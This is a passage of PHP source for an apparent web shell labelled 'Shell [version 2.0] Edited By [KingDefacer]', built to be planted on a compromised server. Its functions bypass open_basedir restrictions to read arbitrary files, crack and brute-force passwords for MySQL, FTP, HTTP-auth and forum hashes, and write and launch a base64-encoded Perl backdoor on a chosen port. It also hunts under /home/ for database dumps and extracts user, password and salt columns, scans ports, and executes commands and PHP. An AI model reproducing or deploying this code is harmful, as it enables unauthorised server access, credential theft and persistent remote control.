"; } elseif(isset($_POST['include_bypass'])) { if(file_exists($_POST['file_bypass'])) { echo ""; } } elseif(isset($_POST['sql_bypass'])) { extract($_SESSION); $conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { mysql_select_db($_POST['sql_db']); mysql_query("CREATE TABLE `$_POST[tmp_table]` (`File` TEXT NOT NULL);"); mysql_query("LOAD DATA INFILE \"$_POST[sql_file]\" INTO TABLE $_POST[tmp_table]") or die(mysql_error()); $res=mysql_query("SELECT * FROM $_POST[tmp_table]"); if(mysql_num_rows($res)<1) die("Failed to retrieve file contents!"); if($res) { while($row=mysql_fetch_array($res)) $f.="$row[0]
"; echo $f; } mysql_query("DROP TABLE $_POST[tmp_table]"); } } echo "
Security (open_basedir) bypassers
Bypass using cURLBypass using tempnam()
Read file:
Write file:
Bypass using copy()Bypass using include()
Copy to:
File to copy:
Path to file:
Bypass using SQL LOAD INFILE [Login to SQL server first]
[Existing] Database to store temporary table:
Temporary table:
"; } function brute_force() { echo "

Password crackers
MD5 CrackerSHA1 Cracker
Hash: Hash:
VBulletin Salt CrackerSMF Salt cracker
Hash:
Salt:
Hash:
Salt:
MySQL Brute ForceFTP Brute Force
User:
Host:
Port:
User:
Host:
Port:
Timeout:
Remote login Brute ForceHTTP-Auth Brute Force
Login form:
Username: 		Username:
Auth URL:
Wordlist


Notice: Be sure to check the max POST length allowed
"; } function BackDoor() { global $backdoor_perl; global $disable; if(!isset($_POST['backdoor_host'])) { echo "
Port:
"; } else { @$fh=fopen("shbd.pl","w"); @fwrite($fh,base64_decode($backdoor_perl)); @fclose($fh); execmd("perl shbd.pl $_POST[port]",$disable); echo "Server backdoor'd
"; } } function sql_rep_search($dir) { global $self; $ext=array(".db",".sql"); @$dh=opendir($dir); while((@$file=readdir($dh))) { $ex=strrchr($file,'.'); if(in_array($ex,$ext)&&$file!="Thumbs.db"&&$file!="thumbs.db") echo "
$dir"."$file
"; if(is_dir($dir.$file)&&$file!='..'&&$file!='.') { if(!preg_match("/\/public_html\//",$dir)) sql_rep_search($dir.$file.'/public_html/'); else sql_rep_search($dir.$file); } } @closedir($dh); } function database_tools() { if(isset($_POST['sql_start_search'])) { echo "
"; sql_rep_search("/home/"); echo "
Databases
"; } $colarr=array(); if(isset($_POST['db_parse'])) { if(!is_file($_FILES['db_upath']['tmp_name'])&&empty($_POST['db_dpath'])) die("Please specify a DB to parse..."); $db_meth=empty($_POST['db_dpath'])?'uploaded':'path'; $q_delimit=$_POST['q_delimit']; if(isset($_POST['column_defined'])) { switch($_POST['column_type']) { case 'SMF': break; case 'phpbb': break; case 'vbulletin': $colarr=array(4,5,7,48); break; } } else { $strr=str_replace(", ",",",trim($_POST['db_columns'])); $colarr=explode(",",$strr); } switch($db_meth) { case 'uploaded': @$fh=fopen($_FILES['db_upath']['tmp_name'],'r') or die("Failed to open file for reading"); break; case 'path': @$fh=fopen($_POST['db_dpath'],'r') or die("Failed to open file for reading"); break; } echo "Parsing database contents...
"; while(!feof($fh)) { $c_line=fgets($fh); $strr=str_replace(", ",",",$c_line); $arr=explode(',',$strr); for($i=0;$i"; } continue; } @fclose($fh); } echo "
Database parser
Quote delimiter (usually ` or '): Columns to retrieve (separate by commas):
Use predefined column match (user+pass+salt):
Path to DB dump:
Upload DB dump:

Find database Backups
Only search within local path:
"; } function show_tools() { echo "
Tools
Forum locatorConfig locator
Passwd file:
Passwd file:
Port scannerSearch
Host: Start port:
Start port: End Port:
Using:
Finish this next
"; } function TrueSize($s) { if(!$s) return 0; if($s>=1073741824) return(round($s/1073741824)." GB"); elseif($s>=1048576) return(round($s/1048576)." MB"); elseif($s>=1024) return(round($s/1024)." KB"); else return($s." B"); } function CleanDir($d) { $d=str_replace("\\","/",$d); $d=str_replace("//","/",$d); return $d; } function Trail($d) { $d=explode('/',$d); array_pop($d); array_pop($d); $str=implode($d,'/'); return $str; } function Encoder() { echo "
Input:
"; } $relpath=(isset($_GET['d']))?CleanDir($_GET['d']):CleanDir(realpath(getcwd())); if(isset($_GET['d'])) $self.="?d=$_GET[d]"; echo "
Execute command
Execute PHP
Create directoryCreate file
Enter directoryEdit file
Upload fileWget file
Save location:
Switch theme: Matrix Green, Uplink Blue, Dark


Shell [version 2.0] Edited By [KingDefacer] | Page generated in : ".round(microtime()-$start,2)." seconds
"; ob_end_flush(); ?>